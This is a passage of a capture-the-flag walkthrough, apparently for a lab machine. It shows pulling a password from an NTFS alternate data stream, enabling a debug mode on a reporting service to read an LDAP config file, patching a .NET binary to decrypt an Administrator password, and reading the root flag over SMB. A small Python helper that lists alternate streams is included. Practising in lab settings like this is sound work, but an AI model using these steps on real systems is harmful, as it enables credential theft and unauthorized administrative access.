stream: [::$DATA], 0 bytes
stream: [:Password:$DATA], 15 bytes

❯ cat Debug\ Mode\ Password.txt:Password
WBQ201953D8w 
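A small triage helper, as an added example that is not part of the walkthrough: it parses a transcript of smbclient allinfo output and reports every named alternate data stream, noting when the visible default stream is empty, which is exactly the pattern above (a 0-byte file with 15 bytes in a Password stream). The same check is useful on the defensive side when reviewing what actually sits on a share. The regexes assume smbclient's allinfo format as printed above; the first record is the one from the box, the second is a constructed ordinary file for contrast, and the function names are mine.

```python
"""Find NTFS alternate data streams in an smbclient 'allinfo' transcript."""
import re

# Constructed sample: record 1 mirrors the walkthrough's output, record 2 is a made-up plain file
SAMPLE_TRANSCRIPT = r'''smb: \C.Smith\HQK Reporting\> allinfo "Debug Mode Password.txt"
altname: DEBUGM~1.TXT
create_time:    Thu Aug  8 07:06:12 PM 2019 EDT
access_time:    Thu Aug  8 07:06:12 PM 2019 EDT
write_time:     Thu Aug  8 07:08:17 PM 2019 EDT
change_time:    Thu Aug  8 07:08:17 PM 2019 EDT
attributes: A (20)
stream: [::$DATA], 0 bytes
stream: [:Password:$DATA], 15 bytes
smb: \C.Smith\HQK Reporting\> allinfo HQK_Config_Backup.xml
altname: HQK_CO~1.XML
attributes: A (20)
stream: [::$DATA], 249 bytes
'''

# prompt line carrying the current directory and the file the command was run on
_CMD_RE = re.compile(r'^smb: (\\.*?)> allinfo\s+"?(.+?)"?\s*$')
# stream line: the id is ':<name>:$DATA'; the unnamed default stream shows as '::$DATA'
_STREAM_RE = re.compile(r'^stream: \[(.*?)\], (\d+) bytes')


def parse_allinfo(transcript):
    """Return {full_path: {stream_name: size_in_bytes}}; '' keys the default stream."""
    records, current = {}, None
    for line in transcript.splitlines():
        m = _CMD_RE.match(line)
        if m:
            cwd, name = m.groups()
            current = records.setdefault(cwd + name, {})
            continue
        m = _STREAM_RE.match(line)
        if m and current is not None:
            stream_id, size = m.groups()
            current[stream_id.split(':')[1]] = int(size)
    return records


def find_alternate_streams(records):
    """One finding per named stream; flags files whose visible content is empty."""
    findings = []
    for path, streams in records.items():
        visible = streams.get('', 0)
        for name, size in streams.items():
            if name == '':
                continue
            findings.append({'path': path, 'stream': name, 'bytes': size,
                             'visible_bytes': visible, 'looks_empty': visible == 0})
    return findings


if __name__ == "__main__":
    for f in find_alternate_streams(parse_allinfo(SAMPLE_TRANSCRIPT)):
        flag = " (visible stream is empty)" if f['looks_empty'] else ""
        print(f"{f['path']} :{f['stream']} -> {f['bytes']} bytes{flag}")
```

Once a stream is identified, smbclient can fetch it by name (get "Debug Mode Password.txt:Password"), which is what the cat of the downloaded file above relies on.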

With this password, DEBUG mode unlocks the SHOWQUERY command on the HQK Reporting Service, which can be used to read files. After spending some time searching around I came across the Ldap.conf file located in ../LDAP/.

❯ telnet 10.10.10.178 4386
Trying 10.10.10.178...
Connected to 10.10.10.178.
Escape character is '^]'.

HQK Reporting Service V1.2

>help
This service allows users to run queries against databases using the legacy HQK format
--- AVAILABLE COMMANDS ---
LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
>DEBUG WBQ201953D8w     
Debug mode enabled. Use the HELP command to view additional commands that are now available
>help
This service allows users to run queries against databases using the legacy HQK format
--- AVAILABLE COMMANDS ---
LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
SERVICE
SESSION
SHOWQUERY <Query_ID>
>setdir ..
Current directory set to HQK
>list
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command
 QUERY FILES IN CURRENT DIRECTORY
[DIR]  ALL QUERIES
[DIR]  LDAP
[DIR]  Logs
[1]   HqkSvc.exe
[2]   HqkSvc.InstallState
[3]   HQK_Config.xml
Current Directory: HQK
>setdir LDAP
Current directory set to LDAP
>list   
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command
 QUERY FILES IN CURRENT DIRECTORY
[1]   HqkLdap.exe
[2]   Ldap.conf
Current Directory: LDAP
>showquery 2
Domain=nest.local
Port=389
BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
User=Administrator
Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=

I used dnSpy to analyze the HqkLdap.exe .NET binary. It turns out that the binary takes its first argument as a config file and extracts the domain, username, and password from it in order to perform an LDAP search. I patched the Main function of the binary to remove the check for the presence of HqkDbImport.exe and then to print the decrypted password to the console.

Getting Root Flag

I surmised that this password was for the Administrator account. I confirmed I could mount the C$ share as the Administrator user and then retrieve the root flag.

❯ smbclient  \\\\10.10.10.178\\c$ -U Administrator
Enter WORKGROUP\Administrator's password: 
Try "help" to get a list of possible commands.
smb: \> cd Users\Administrator\Desktop\
smb: \Users\Administrator\Desktop\> ls
  .                                  DR        0  Sun Jan 26 02:20:50 2020
  ..                                 DR        0  Sun Jan 26 02:20:50 2020
  desktop.ini                       AHS      282  Sat Jan 25 17:02:44 2020
  root.txt                            A       32  Mon Aug  5 18:27:26 2019
                10485247 blocks of size 4096. 6544088 blocks available
smb: \Users\Administrator\Desktop\> get root.txt
getting file \Users\Administrator\Desktop\root.txt of size 32 as root.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)

❯ cat root.txt
[redacted]